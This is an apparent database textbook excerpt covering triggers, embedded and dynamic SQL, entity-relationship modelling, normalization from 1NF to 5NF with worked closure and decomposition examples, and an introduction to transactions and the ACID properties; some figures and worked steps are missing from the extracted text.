The trigger_name must be unique for triggers in the schema. A trigger cannot be invoked
directly like function or procedure. It will be invoked automatically by its triggering event. A
trigger can be made to execute before/after the operations such as insert/update/delete.
Example:
The following trigger displays the total balance in the bank whenever a new account is
created.
create or replace trigger trg_total_balance    -- the trigger name is illustrative
after insert on Account
declare
   a int;
begin
   select sum(Balance) into a from Account;
   dbms_output.put_line(a);
end;
Triggers serve many useful purposes in applications such as banking and railway reservation systems. Triggers should be written with care, since the action of one trigger can invoke another and may even lead to an infinite chain of triggering. Hence triggers should be avoided whenever alternatives exist; many trigger applications can be substituted by appropriate use of stored procedures.
SQL can be embedded in almost all high-level languages due to the vast support it has
from almost all developers. Languages like C, C++, Java etc, support SQL integration. Some
languages like python have inbuilt libraries to integrate the database queries in the code. For
python, we have the SQLite library which makes it easy to connect to the database using the
embedding process.
Embedded SQL provides a means by which a program can interact with a database
server. However, under embedded SQL, the SQL statements are identified at compile time
using a preprocessor, which translates requests expressed in embedded SQL into function calls.
At runtime, these function calls connect to the database using an API that provides dynamic
SQL facilities but may be specific to the database that is being used.
Embedded SQL gives us the freedom to use databases as and when required. Once the application we develop goes into production, several things need to be taken care of, one major aspect being authorization and the fetching and feeding of data into and from the database. With the help of embedded queries, we can use the database without writing any bulky code. With embedded SQL, we can create APIs which can easily fetch and feed data as and when required.
For using embedded SQL, we need some tools in each high-level language. In some
cases, we have inbuilt libraries which provide us with the basic building block. While in some
cases we need to import or use some packages to perform the desired tasks.
For example, in Java, we need a Connection class. We first create a connection using the Connection class and then open the connection by passing the required parameters to connect with the database.
The distinction between an SQL statement and host language statement is made by using
the key word EXEC SQL; thus, this key word helps in identifying the Embedded SQL
statements by the pre-compiler.
Class.forName("com.mysql.jdbc.Driver");
After creating the connection using the statement, we can create SQL query and execute it using
the connection object.
Host variables
• Database manager cannot work directly with high level programming language
variables.
• Instead, special variables known as host variables must be used to move data between an application and a database.
Small footprint database: As embedded SQL uses an Ultra Lite database engine
compiled specifically for each application, the footprint is generally smaller than when using
an Ultra Lite component, especially for a small number of tables. For a large number of tables,
this benefit is lost.
High performance: Combining the high performance of C and C++ applications with
the optimization of the generated code, including data access plans, makes embedded SQL a
good choice for high-performance application development.
Extensive SQL support: With embedded SQL you can use a wide range of SQL in your
applications.
Knowledge of C or C++ required: If you are not familiar with C or C++ programming,
you may wish to use one of the other Ultra Lite interfaces. Ultra Lite components provide
interfaces from several popular programming languages and tools.
Complex development model: The use of a reference database to hold the Ultra Lite
database schema, together with the need to pre-process your source code files, makes the
embedded SQL development process complex. The Ultra Lite components provide a much
simpler development process.
SQL must be specified at design time: Only SQL statements defined at compile time
can be included in your application. The Ultra Lite components allow dynamic use of SQL
statements.
Dynamic SQL statements, unlike embedded SQL statements, are built at run time and placed in a string in a host variable. The created SQL statements are then sent to the DBMS for processing. Dynamic SQL is generally slower than statically embedded SQL because it requires complete processing, including access-plan generation, at run time.
Dynamic SQL is a programming technique that allows you to construct SQL statements
dynamically at runtime. It allows you to create more general purpose and flexible SQL
statement because the full text of the SQL statements may be unknown at compilation. For
example, you can use the dynamic SQL to create a stored procedure that queries data against a
table whose name is not known until runtime.
• The query can be entered completely as a string by the user or s/he can be suitably
prompted.
• The query can be fabricated by concatenating strings. How this is done is language dependent and is not a portable feature.
• Any modification of the query should be done keeping security in mind.
• The query is prepared and executed using a suitable SQL EXEC command.
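A minimal PL/SQL sketch of this pattern, using native dynamic SQL (EXECUTE IMMEDIATE) and assuming the product table created in Section 3.9.2 (the values used are illustrative):

declare
   v_table varchar2(30) := 'product';      -- table name decided at run time
   v_sql   varchar2(200);
begin
   -- build the statement as a string and execute it with bind variables
   v_sql := 'insert into ' || v_table || ' values (:1, :2)';
   execute immediate v_sql using 102, 'Keyboard';
end;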
CHAPTER – IV
ENTITY RELATIONSHIP MODEL
The data model describes the structure of a database. It is a collection of conceptual tools for describing data, data relationships and consistency constraints. Data models are classified into various types, the physical model being one of them.
The ER model is a classical, popular conceptual data model. It was first introduced in the mid-1970s as a (relatively minor) improvement to the relational model, since pictorial diagrams are easier to read than relational database schemas. It has since evolved into a popular model for the first conceptual representation of data structures in the process of database design.
The entity-relationship data model perceives the real world as consisting of basic objects,
called entities and relationships among these objects. It was developed to facilitate database
design by allowing specification of an enterprise schema which represents the overall logical
structure of a database.
• It allows us to describe the data involved in a real world enterprise in terms of objects
and their relationships.
• It provides a set of useful concepts that make it convenient for a developer to move from a basic set of information to a detailed and precise description of information that can be easily implemented in a database system.
1. Entity sets
2. Relationship sets
3. Attributes.
An entity is a "thing" or "object" in the real world that is distinguishable from all other objects. For example, each person in an enterprise is an entity. An entity has a set of properties, and the values of some set of properties may uniquely identify an entity. BOOK is an entity, and its properties (called attributes) are bookcode, booktitle, price, etc.
An entity set is a set of entities of the same type that share the same properties, or
attributes. Example: The set of all persons who are customers at a given bank.
4.2.3. Attributes
Customer is an entity and its attributes are customerid, custmername, custaddress etc. An
attribute as used in the E-R model, can be characterized by the following attribute types.
a) Simple and Composite Attributes
Simple attributes are the attributes which cannot be divided into subparts, e.g., customerid, empno. Composite attributes are the attributes which can be divided into subparts, e.g., name, consisting of first name, middle name and last name, and address, consisting of city, pincode and state.
b) Single-valued and Multi-valued Attributes
An attribute that holds a single value for a particular entity is a single-valued attribute, e.g., empno, customerid, regdno. An attribute that can hold more than one value for an entity is a multi-valued attribute, e.g., phone-no, dependent-name, vehicle.
c) Derived Attribute
The values for this type of attribute can be derived from the values of existing attributes,
e.g. age which can be derived from currentdate – birthdate and experience_in_year can
be calculated as currentdate - joindate.
The attribute value which is not known to user is called NULL valued attribute.
Consider the two entity sets customer and loan. We define the relationship set borrow
to denote the association between customers and the bank loans that the customers have.
1. One to One: An entity in A is associated with at most one entity in B, and an entity in B is associated with at most one entity in A. Example: a College has one Principal.
2. One to Many: An entity in A is associated with any number of entities in B, but an entity in B is associated with at most one entity in A. Example: a Department has many Faculty members.
3. Many to One: An entity in A is associated with at most one entity in B, but an entity in B is associated with any number of entities in A.
4. Many to Many: Entities in A and B are associated with any number of entities of each other. Example: Customers deposit into Accounts; a customer can have several accounts and an account can be held by several customers.
Recursive Relationships
When the same entity type participates more than once in a relationship type in different
roles, the relationship types are called recursive relationships.
Participation Constraints
The participation constraints specify whether the existence of any entity depends on its
being related to another entity via the relationship. There are two types of participation
constraints.
a) Total: When all the entities from an entity set participate in a relationship type, the participation is called total participation. For example, the participation of the entity set student in the relationship set 'opts' is said to be total because every student enrolled must opt for a course.
b) Partial: When it is not necessary for all the entities from an entity set to participate in a
relationship type, it is called partial participation. For example, the participation of the
entity set student in ‘represents’ is partial, since not every student in a class is a class
representative.
Weak Entity
Entity types that do not contain any key attribute, and hence cannot be identified
independently are called weak entity types. A weak entity can be identified uniquely only by considering some of its attributes in conjunction with the primary key attribute of another entity, which is called the identifying owner entity.
Generally a partial key is attached to a weak entity type that is used for unique
identification of weak entities related to a particular owner type. The following restrictions must
hold:
• The owner entity set and the weak entity set must participate in one to many relationship
set. This relationship set is called the identifying relationship set of the weak entity set.
• The weak entity set must have total participation in the identifying relationship.
Example
Consider the entity type Dependent related to the Employee entity, which is used to keep track of the dependents of each employee. The attributes of Dependent are name, birthdate, sex and relationship. Each employee entity is said to own the dependent entities that are related to it. Note, however, that the Dependent entity does not exist on its own; it is dependent on the Employee entity.
4.3. ER-DIAGRAM
The overall logical structure of a database is represented graphically with the help of an
ER- diagram.
The common notations used in an ER diagram are:
Rectangle: entity set
Ellipse: attribute
Connected ellipses: composite attribute
Underlined attribute name: identifying (key) attribute
Diamond: relationship set
Dashed ellipse: derived attribute
Double line: total participation
Single line: partial participation
4.3.2. Examples
Example: An E-R diagram for a university registrar's office, which maintains information about course offerings, including course number, year, semester, section number, instructor, timings, and class room.
Further, the enrollment of students in courses and the grades awarded to students in each course they are enrolled for must be appropriately modeled. The E-R diagram for this registrar's office is given below:
As the complexity of data increased in the late 1980s, it became more and more difficult
to use the traditional ER Model for database modelling. Hence some improvements or
enhancements were made to the existing ER Model to make it able to handle the complex
applications better.
Hence, as part of the Enhanced ER Model, along with other improvements, three new
concepts were added to the existing ER Model, they were:
1. Generalization
2. Specialization
3. Aggregation
4.4.1. Generalization
Generalization is a bottom-up approach in which two lower level entities combine to
form a higher level entity. In generalization, the higher level entity can also combine with other
lower level entities to make further higher level entity.
It's more like Superclass and Subclass system, but the only difference is the approach,
which is bottom-up. Hence, entities are combined to form a more generalized entity, in other
words, sub-classes are combined to form a super- class.
For example, Saving and Current account types entities can be generalized and an entity
with name Account can be created, which covers both.
4.4.2. Specialization
Specialization is the opposite of generalization. It is a top-down approach in which one higher-level entity can be broken down into two or more lower-level entities. In specialization, it is also possible that a higher-level entity has no lower-level entity sets at all.
4.4.3. Aggregation
Aggregation is a process in which a relationship between two entities is itself treated as a single higher-level entity.
In the diagram above, the relationship between Center and Course together is acting as an entity, which is in a relationship with another entity, Visitor. In the real world, if a visitor or a student visits a coaching center, he/she will never enquire about the center alone or just about the course; rather, he/she will enquire about both.
ER Model can be represented using ER Diagrams which is a great way of designing and
representing the database design in more of a flow chart form. It is very convenient to design
the database using the ER Model by creating an ER diagram and later on converting it into
relational model to design your tables. Not all the ER Model constraints and components can
be directly transformed into relational model, but an approximate schema can be derived. ER
diagrams are converted into relational model schema, hence creating tables in RDBMS.
An entity in the ER model is converted into a table; that is, for every entity in the ER model, a table is created in the relational model. The attributes of the entity become the columns of the table, and the primary key specified for the entity in the ER model becomes the primary key of the table in the relational model.
A table with name Student will be created in relational model, which will have 4
columns, id, name, age, address and id will be the primary key for this table.
Table: Student
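A sketch of the corresponding table definition in SQL (the data types are assumptions):

create table Student (
    id      int primary key,
    name    varchar(30),
    age     int,
    address varchar(50)
);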
In the ER diagram below, we have two entities Teacher and Student with a relationship
between them.
As discussed above, entity gets mapped to table, hence we will create table for Teacher
and a table for Student with all the attributes converted into columns.
Now, an additional table will be created for the relationship - for example, Student_Teacher, or any other suitable name. This table will hold the primary keys of both Student and Teacher in a tuple, to describe which teacher teaches which student.
If there are additional attributes related to this relationship, such as subject name, they become columns of this table. Proper foreign key constraints must also be set for all the tables.
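As a rough illustration of this mapping, the following Python sketch generates the DDL for the two entity tables and for the relationship table. The table and column names used here (Student, Teacher, Student_Teacher, subject_name and the key columns) are illustrative assumptions, not names fixed by the text.

# A minimal sketch of the ER-to-relational mapping described above.
# All table and column names below are illustrative assumptions.
entity_tables = {
    "Student": ["id INT PRIMARY KEY", "name VARCHAR(50)", "age INT", "address VARCHAR(100)"],
    "Teacher": ["tid INT PRIMARY KEY", "tname VARCHAR(50)"],
}

# The relationship between Teacher and Student becomes its own table that holds
# both primary keys plus any attribute of the relationship itself (subject_name).
relationship_table = (
    "CREATE TABLE Student_Teacher (\n"
    "    id INT,\n"
    "    tid INT,\n"
    "    subject_name VARCHAR(50),\n"
    "    PRIMARY KEY (id, tid),\n"
    "    FOREIGN KEY (id) REFERENCES Student(id),\n"
    "    FOREIGN KEY (tid) REFERENCES Teacher(tid)\n"
    ");"
)

for name, columns in entity_tables.items():
    print("CREATE TABLE " + name + " (\n    " + ",\n    ".join(columns) + "\n);")
print(relationship_table)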
CHAPTER – V
NORMALIZATION
A functional dependency α → β holds on R if and only if, for any legal relation r(R), whenever any two tuples t1 and t2 of r agree on the attributes α, they also agree on the attributes β. That is,
if t1[α] = t2[α], then t1[β] = t2[β].
A B C
1 4 2
1 5 1
3 7 2
1 5 5
On this instance, B → A holds. The reason is that B's value 5 occurs in row 2 and row 4, and the corresponding A value is 1 in both rows. But this is not the case for A → B, since A has the value 1 in three rows but the corresponding B values are not the same (4 in row 1 and 5 in rows 2 and 4).
The Rollno 12345 is repeated two times (1st row and 3rd row) and the corresponding name is Raghuveer in both rows. The same is true for Rollno 12346 as well, which shows that Name is functionally dependent on Rollno, i.e., Rollno → Name.
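The following Python sketch checks whether a functional dependency X → Y holds on a relation instance; the sample rows reproduce the A, B, C instance shown above.

def fd_holds(rows, X, Y):
    # True if every pair of rows that agrees on X also agrees on Y
    seen = {}
    for row in rows:
        x_val = tuple(row[a] for a in X)
        y_val = tuple(row[a] for a in Y)
        if x_val in seen and seen[x_val] != y_val:
            return False
        seen[x_val] = y_val
    return True

rows = [
    {"A": 1, "B": 4, "C": 2},
    {"A": 1, "B": 5, "C": 1},
    {"A": 3, "B": 7, "C": 2},
    {"A": 1, "B": 5, "C": 5},
]
print(fd_holds(rows, ["B"], ["A"]))   # True  : B -> A holds on this instance
print(fd_holds(rows, ["A"], ["B"]))   # False : A -> B does not hold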
Key:
For any relation R, the key is defined as an attribute or set of attributes that functionally
determines all the attributes of the relation.
Let us recall the types of keys - super key, candidate key and primary key - that we discussed in Section 2.2.
Super Key: A super key is a set of one or more attributes that uniquely identifies rows in a table. It may have extraneous attributes, i.e., attributes beyond those needed to identify a row.
Candidate key: The minimal set of attributes which uniquely identifies a tuple is known as a candidate key, i.e., a key without extraneous attributes.
Primary Key: Primary key uniquely identifies a tuple/row. Candidate key also identifies a
record uniquely, but a relation can have many candidate keys. Any one candidate key is chosen
as primary key and a relation can have only one primary key.
Let us see an example for the above keys. The employee details contain the following
information.
The EmpId determines a unique row, and the composite attribute (EmpName, Address) also identifies a unique row. Hence these are the two candidate keys in this relation. The user can choose any one of the candidate keys as the primary key - for example, EmpId. A super key may have extraneous attributes in addition to a candidate key. Some of the super keys are EmpId, (EmpId, EmpName), (EmpId, EmpDesignation) and (EmpId, EmpName, Address).
Partial dependencies: Consider a relation whose primary key consists of more than one attribute. A subset of the non-key attributes may depend on only one of the key attributes and not on the entire primary key. Such dependencies are called partial dependencies.
1. What is (AB)+?
Iterations:
Example 2:
(CF)+ = {CFB} // CF is not a key since A, D and E are missing in (CF)+
If ABF is considered as a candidate, then (ABF)+ = {ABFCDE}, which includes all the attributes of the relation. So, ABF is a key.
Example 3:
FD1 : A→ BC
FD2 : C →B
FD3 : D → E
FD4 : E → D
Solution:
{A}+ = {A, B, C}
{B}+ = {B}
{C}+ = {C, B }
{D}+ = {D, E}
{E}+ = {E,D}
None of the closures of A, B, C, D or E includes all the attributes of the relation, so no single attribute is a key. Hence, we need to combine two or more attributes to determine the candidate keys. Let us check (AD) and (AE).
(AD)+ and (AE)+ include all the attributes in the relation. Hence AD and AE are candidate keys of relation R. (Note: We can choose either one as the primary key.)
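The attribute-closure computation used above can be sketched in Python as follows; each functional dependency is written as a (left-hand side, right-hand side) pair of attribute sets.

def closure(attrs, fds):
    # repeatedly add the right-hand side of every FD whose left-hand side is covered
    result = set(attrs)
    changed = True
    while changed:
        changed = False
        for lhs, rhs in fds:
            if lhs <= result and not rhs <= result:
                result |= rhs
                changed = True
    return result

R = {"A", "B", "C", "D", "E"}
fds = [({"A"}, {"B", "C"}), ({"C"}, {"B"}), ({"D"}, {"E"}), ({"E"}, {"D"})]
print(closure({"A"}, fds))             # {'A', 'B', 'C'}  -> A alone is not a key
print(closure({"A", "D"}, fds) == R)   # True             -> AD is a candidate key
print(closure({"A", "E"}, fds) == R)   # True             -> AE is a candidate key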
• Armstrong’s axioms are sound, because they do not generate any incorrect functional
dependencies.
• They are complete, because, for a given set F of functional dependencies, they allow us
to generate all F+.
Additional Rules:
Example 1:
Let R = (A, B, C, G, H, I)
F = { A → B, A → C, CG → H, CG → I, B → H }
Some members of F+
A→H by transitivity from A → B and B → H
AG → I by augmenting A → C with G, to get AG → CG and
then transitivity with CG → I
CG → HI by augmenting CG → I with CG to infer CG → CGI, augmenting CG → H with I to infer CGI → HI, and then applying transitivity.
Example 2:
Suppose, R is a relation with attributes (A, B, C, D, E, F) and with the identified set F of
functional dependencies as follows;
F = { A → B, A → C, CD → E, B → E, CD → F }
Find the closure of Functional Dependency F+.
The closure of functional dependency (F+) includes F and new functional dependencies inferred
using the algorithm mentioned above.
1. A → E is logically implied. From our F we have the two FDs A → B and B → E. By applying the transitivity rule, we can infer A → E.
2. A → BC is logically implied. It can be inferred from the FDs A → B and A → C
using Union rule.
A decomposition of R into R1 and R2 is a lossless decomposition if at least one of the following functional dependencies is in F+:
R1 ∩ R2 → R1
R1 ∩ R2 → R2
Example:
Let us consider the relation inst_dept (ID, name, salary, dept_name, building, budget) decomposed into instructor (ID, name, dept_name, salary) and department (dept_name, building, budget). Here R1 ∩ R2 = {dept_name}, and dept_name → building, budget holds, i.e., dept_name is a key for department.
The lossless-decomposition rule is satisfied and hence the decomposition is lossless.
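A small Python sketch of this lossless-join test is given below. It assumes the FDs ID → name, dept_name, salary and dept_name → building, budget, and uses a compact attribute-closure routine.

def closure(attrs, fds):
    result = set(attrs)
    while True:
        added = {a for lhs, rhs in fds if lhs <= result for a in rhs}
        if added <= result:
            return result
        result |= added

def lossless(R1, R2, fds):
    # a binary decomposition is lossless if (R1 ∩ R2) determines R1 or R2
    common_closure = closure(R1 & R2, fds)
    return R1 <= common_closure or R2 <= common_closure

instructor = {"ID", "name", "dept_name", "salary"}
department = {"dept_name", "building", "budget"}
fds = [({"ID"}, {"name", "dept_name", "salary"}),
       ({"dept_name"}, {"building", "budget"})]
print(lossless(instructor, department, fds))   # True -> the decomposition is lossless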
5.3. NORMALIZATION
• Repetition of Information.
Example: Consider the following table which contains the exam results of students. Assume
that each student can enrol in many courses. Mathews has enrolled in two courses C1 & C2 and
Kiran has enrolled in only one course.
A relation is said to be in 1 NF, if it has no repeating groups and data must be atomic.
• A set of names is an example of a non-atomic value. For example, if the schema of a
relation employee included attribute children whose domain elements are sets of names,
the schema would not be in first normal form.
• Composite attributes, such as an attribute address with component attributes street, city,
state, and zip also have non atomic domains.
• Let us consider a scenario in which a student can register in more than one course.
Sample data is shown below.
ID Name Courses
-------------------------------------------
1 Banu c1, c2
2 Elamaran c3
3 Meena c2, c3
The above relation is not in 1NF, since the Courses attribute holds multiple values for a single tuple. The tuples have to be stored as follows, and now the relation is in 1NF.
ID Name Course
--------------------------
1 Banu c1
1 Banu c2
2 Elamaran c3
3 Meena c2
3 Meena c3
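The conversion to 1NF can be viewed as flattening the multi-valued Courses attribute into atomic rows, as the following small Python fragment illustrates.

unnormalized = [
    (1, "Banu", ["c1", "c2"]),
    (2, "Elamaran", ["c3"]),
    (3, "Meena", ["c2", "c3"]),
]

# one output row per (student, course) pair: each attribute value is now atomic
first_normal_form = [(sid, name, course)
                     for sid, name, courses in unnormalized
                     for course in courses]
for row in first_normal_form:
    print(row)   # (1, 'Banu', 'c1'), (1, 'Banu', 'c2'), (2, 'Elamaran', 'c3'), ...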
Eg. Let R={A,B,C,D} with candidate key AB. Then the prime attributes are A and B
and nonprime attributes are C and D.
Example:
Given details in the ExamResult table are:
• sid
• sname
• cid
• cname
• mark
The Functional dependencies are
FD1: sid→ sname ---partial dependency
FD2: cid → cname ---partial dependency
FD3: sid cid → mark --- Full dependency
The key for the relation is (sid, cid). The functional dependency FD3 is only full
dependency, since mark depends fully on the key sid,cid.
The functional dependency FD1 is partial, since sname depends only on sid and not on cid. Similarly, the functional dependency FD2 is also partial, since cname depends only on cid and not on sid. The relation is therefore decomposed as follows to satisfy 2NF:
R1(sid, sname)
R2(cid, cname)
R3(sid, cid, mark)
Transitive dependency
A transitive dependency exists when a non-key attribute depends on another non-key attribute rather than directly on the key, i.e., X → Y and Y → Z hold, so X → Z holds transitively.
A table is in 3NF if it is in 2NF and, for each functional dependency X → Y, at least one of the following conditions holds: (a) X is a super key of the table, or (b) Y is a prime attribute (part of some candidate key).
Example:
INVOICE
Customer no:
Customer name:
Address:
Invoice ( cus_no,name,addr,(isbn,title,author,city,zip,qty,price))
1 NF:
customer (cus_no, name, addr)
invoice (cus_no, isbn, title, author, city, zip, qty, price)
2 NF:
Here, the key of the invoice relation is (cus_no, isbn). The qty attribute depends on both key attributes, but the other attributes such as title, author, city, zip and price depend only on isbn. This indicates a partial dependency, so the table is decomposed as follows:
customer (cus_no,name,addr) - R1
sales (cus_no,isbn,qty) - R2
book (isbn,title,author,city,zip,price) - R3
3 NF:
In the book relation, city depends on zip (zip → city), which is a transitive dependency through isbn, so the book relation is further decomposed. Now there are 4 relations after decomposition and all the relations satisfy 3NF.
customer (cus_no, name, addr)
sales (cus_no, isbn, qty)
zip (zipcode, city)
book (isbn, title, author, zipcode, price)
Let F be a set of functional dependencies on a schema R, and let R1, R2, ..., Rn be the
decomposition of R. The restriction of F to Ri is the set Fi of all functional dependencies in F+
that include only attributes of Ri .
Since all functional dependencies in a restriction involve attributes of only one relation
schema, it is possible to test such a dependency for satisfaction by checking only one relation.
compute F+;
F' := { };
for each schema Ri in the decomposition
begin
Fi := the restriction of F+ to Ri;
F' := F' ∪ Fi;
end
compute F'+;
if (F'+ = F+) return (true)
else return (false);
Example 1: Let R(A, B, C) with F = {A → B, B → C} be decomposed into R1(A, B) and R2(B, C). Check whether the decomposition is dependency preserving.
Step 1:
Find F+.
F+ = {A → B, B → C, A → C, A → BC}
Step 2:
Find the restriction of F+ to the decomposed relations R1 and R2 (the functional dependencies applicable to R1 and R2 separately). Here F1 = {A → B} and F2 = {B → C}.
Step 3:
F’ = {A → B, B → C}
Step 4:
F’+ = {A → B, B → C, A → C, A → BC}
Step 5:
Check whether F+ and F'+ are the same. Since both are the same here, the decomposition is dependency preserving.
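A rough Python sketch of this dependency-preservation test for the same example is given below. For simplicity it compares attribute closures under F and under F' (the union of the restrictions) for every subset of R, rather than materializing F+ explicitly.

from itertools import chain, combinations

def closure(attrs, fds):
    result = set(attrs)
    while True:
        added = {a for lhs, rhs in fds if lhs <= result for a in rhs}
        if added <= result:
            return result
        result |= added

def restriction(fds, Ri):
    # the FDs X -> (X+ ∩ Ri) for every X ⊆ Ri capture the restriction of F+ to Ri
    subsets = chain.from_iterable(combinations(Ri, n) for n in range(1, len(Ri) + 1))
    return [(set(X), closure(set(X), fds) & Ri) for X in subsets]

def preserves_dependencies(R, fds, decomposition):
    f_prime = [fd for Ri in decomposition for fd in restriction(fds, Ri)]
    subsets = chain.from_iterable(combinations(R, n) for n in range(1, len(R) + 1))
    return all(closure(set(X), fds) == closure(set(X), f_prime) for X in subsets)

R = {"A", "B", "C"}
F = [({"A"}, {"B"}), ({"B"}, {"C"})]
print(preserves_dependencies(R, F, [{"A", "B"}, {"B", "C"}]))   # True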
Let R be a schema that is not in BCNF. Then there is at least one nontrivial functional dependency α → β such that α is not a super key for R. We replace R in our design with the two schemas (α ∪ β) and (R − (β − α)).
3. A 3NF decomposition may preserve all the dependencies, whereas a BCNF decomposition may not preserve the dependencies.
Example:
FD1: A→BCD
FD2: BC→AD
FD3: D→B.
The keys are A and BC, since (A)+ = {A, B, C, D} and (BC)+ = {B, C, A, D} include all the attributes. The attribute D is not a key since (D)+ = {D, B}, where A and C are missing. There is no partial dependency or transitive dependency. Hence the given relation satisfies 1NF, 2NF and 3NF.
In FD1 and FD2, the determinants A and BC are keys respectively. But in FD3, the determinant D is not a key. Hence the relation R has to be decomposed. FD3: D → B violates BCNF. Take the left-side attribute D as α and the right-side attribute B as β.
R(A,B,C,D)
R1(DB) R2(ADC)
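One BCNF decomposition step for this example can be sketched in Python as follows, applying the rule of replacing R by (alpha union beta) and (R minus (beta minus alpha)).

def closure(attrs, fds):
    result = set(attrs)
    while True:
        added = {a for lhs, rhs in fds if lhs <= result for a in rhs}
        if added <= result:
            return result
        result |= added

R = {"A", "B", "C", "D"}
fds = [({"A"}, {"B", "C", "D"}), ({"B", "C"}, {"A", "D"}), ({"D"}, {"B"})]

alpha, beta = {"D"}, {"B"}                  # FD3: D -> B is the violating dependency
print(closure(alpha, fds) >= R)             # False -> D is not a super key, BCNF violated
R1 = alpha | beta                           # {'B', 'D'}
R2 = R - (beta - alpha)                     # {'A', 'C', 'D'}
print(sorted(R1), sorted(R2))               # ['B', 'D'] ['A', 'C', 'D']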
Functional dependencies rule out certain tuples from being in a relation. If A → B, then
we cannot have two tuples with the same A value but different B values. Multivalued
dependencies, on the other hand, do not rule out the existence of certain tuples. Instead, they
require that other tuples of a certain form be present in the relation
A multivalued dependency α →→ β holds on R if, in any legal relation r(R), for all pairs of tuples t1 and t2 in r such that t1[α] = t2[α], there exist tuples t3 and t4 in r such that:
t1[α] = t2[α] = t3[α] = t4[α]
t3[β] = t1[β] and t3[R − β] = t2[R − β]
t4[β] = t2[β] and t4[R − β] = t1[R − β]
To illustrate the difference between functional and multivalued dependencies, we consider the
schema shown in Figure 5.2.
The department name is repeated for each address of the instructor (for example, if he has two addresses), and we must repeat the address of the instructor for each department with which he is associated (for example, if he works for two departments). This repetition is unnecessary, since
the relationship between an instructor and his address is independent of the relationship between
that instructor and a department.
In the above example, the instructor with ID 22222 is associated with the Physics
department and he has two houses. His department is associated with all his addresses.
1. To test relations to determine whether they are legal under a given set of functional and
multivalued dependencies.
• α →→ β is trivial (i.e., β ⊆ α or α ∪ β = R)
• α is a super key for the schema R
Note that the definition of 4NF differs from the definition of BCNF in only the use of
multivalued dependencies. Every 4NF schema is in BCNF.
multivalued dependencies hold on each ri . Recall that, for a set F of functional dependencies,
the restriction Fi of F to Ri is all functional dependencies in F+ that include only attributes of Ri.
result := {R}; done := false;
compute D+; Let Di denote the restriction of D+ to Ri;
while (not done) do
if (there is a schema Ri in result that is not in 4NF w.r.t. Di) then begin
let α →→ β be a nontrivial MVD on Ri such that α → Ri is not in Di and α ∩ β = ∅;
result := (result − Ri) ∪ (Ri − β) ∪ (α, β);
end
else done := true;
The analogy between 4NF and BCNF applies to the algorithm for decomposing a
schema into 4NF. It is identical to the BCNF decomposition algorithm, except that it uses
multivalued dependencies and uses the restriction of D+ to Ri .
Consider again the BCNF schema: R(ID, dept name, street, city) in which the
multivalued dependency “ID →→ street, city” holds. Even though this schema is in BCNF, the
design is not ideal, since we must repeat an instructor’s address information for each
department. We can use the given multivalued dependency to improve the database design, by
decomposing this schema into a fourth normal form decomposition.
If we apply the algorithm to Relation R(ID, dept name, street, city), then we find that
ID→→ dept name is a nontrivial multivalued dependency, and ID is not a superkey for the
schema. Following the algorithm, we replace it by two schemas: R1(ID,dept name),R2(ID,
street, city). This pair of schemas is now in 4NF and eliminates the redundancy we encountered earlier.
The notation used for a join dependency on a table T is *(X, Y, ..., Z), where X, Y, ..., Z are projections of T. Table T is said to satisfy the above join dependency if it is equal to the join of the projections X, Y, ..., Z.
R1 ( E_Name, Company)
E_Name Company
Rohit TVR
Shiva TMT
Anu APT
Rani TVR
R2 (E_Name, Product)
E_Name Product
Rohit Computer
Shiva Furniture
Rani Scanner
R3(Company, Product)
Company Product
TVR Computer
TMT Furniture
TVR Scanner
If the natural join of all three tables yields the relation table R, the relation will be said
to have join dependency. Let us check whether R satisfies join dependency or not.
Step 1
Perform the natural join of R1 and R2. The common field is E_Name.
Step 2
Perform the natural join of the above resultant table with R3. The common fields are
Company and Product.
In the above example, we get the same table R after performing the natural joins. Therefore, the decomposition is a lossless decomposition and all three decomposed relations R1, R2 and R3 satisfy fifth normal form.
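The join-dependency check can be sketched in Python by natural-joining the three projections and comparing the result with the original relation R; the tuples below reproduce R1, R2 and R3 above.

def natural_join(rows1, rows2):
    # join two lists of dictionaries on their common attribute names
    common = set(rows1[0]) & set(rows2[0])
    return [dict(r1, **r2) for r1 in rows1 for r2 in rows2
            if all(r1[a] == r2[a] for a in common)]

R1 = [{"E_Name": "Rohit", "Company": "TVR"}, {"E_Name": "Shiva", "Company": "TMT"},
      {"E_Name": "Anu", "Company": "APT"}, {"E_Name": "Rani", "Company": "TVR"}]
R2 = [{"E_Name": "Rohit", "Product": "Computer"}, {"E_Name": "Shiva", "Product": "Furniture"},
      {"E_Name": "Rani", "Product": "Scanner"}]
R3 = [{"Company": "TVR", "Product": "Computer"}, {"Company": "TMT", "Product": "Furniture"},
      {"Company": "TVR", "Product": "Scanner"}]

step1 = natural_join(R1, R2)       # Step 1: join on the common field E_Name
result = natural_join(step1, R3)   # Step 2: join on the common fields Company and Product
for row in result:
    print(row)                     # compare these tuples with the original table R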
CHAPTER – VI
TRANSACTIONS
6.1.1 Introduction
A transaction is a collection of operations that form a single logical unit of work. For example, the transfer of money from one account to another is a transaction which consists of two operations - withdrawal from one account and deposit into another account. A transaction consists of all operations executed between the begin transaction and end transaction statements.
read(X) - transfers the data item X from the database to a variable, also called X, in a buffer in
main memory belonging to the transaction that executed the read operation.
write(X) - transfers the value in the variable X in the main-memory buffer of the transaction
that executed the write to the data item X in the database.
There are four important properties that a transaction should satisfy – Atomicity,
Consistency, Isolation and Durability.
• Atomicity
▪ If the transaction fails after step 3 and before step 6 due to a power failure, then Account A will have Rs.950 and Account B will have Rs.2000 (since B is not updated due to the failure, Rs.50 is "lost", which leads to an inconsistent state). At times, the failure may be because of software or hardware.
▪ The system should ensure that updates of a partially executed transaction are not
reflected in the database. The updates should be complete- Do everything or Don’t
do anything.
• Consistency
• Isolation
When more than one transaction is executed concurrently, each transaction is unaware
that other transactions are being executed concurrently in the system. For every pair of
transactions Ti and Tj , it appears to Ti that either Tj finished execution before Ti started
or Tj started execution after Ti finished. The transactions must behave as if they are
executed in isolation. It means that the results of concurrent execution of transactions
should be the same as if the transactions are executed serially in some order.
• Durability
After the successful completion of the transaction (i.e., the transfer of the Rs50 from
Account A to Account B), the updates to the database by the transaction must persist
i.e., permanent even if there are software or hardware failures.
Example:
Let us consider the amount in Account A is Rs.1000 and B is Rs.2000. The following
transaction transfers Rs.50 from account A to account B. After successful completion
of the transaction, Account A will have Rs.950 and B will have Rs.2050.
1. read(A)
2. A := A – 50 // Subtracts 50 from A
3. write(A)
4. read(B)
5. B := B + 50 // Adds 50 to B
6. write(B)
A transaction may not always complete its execution successfully; it may fail due to a failure in hardware or software. Such a transaction is called an aborted transaction, and an aborted transaction should not have any effect on the state of the database. In order to maintain the atomicity property, any changes made by the aborted transaction must be undone, i.e., rolled back. A transaction that completes its execution successfully is said to be committed.
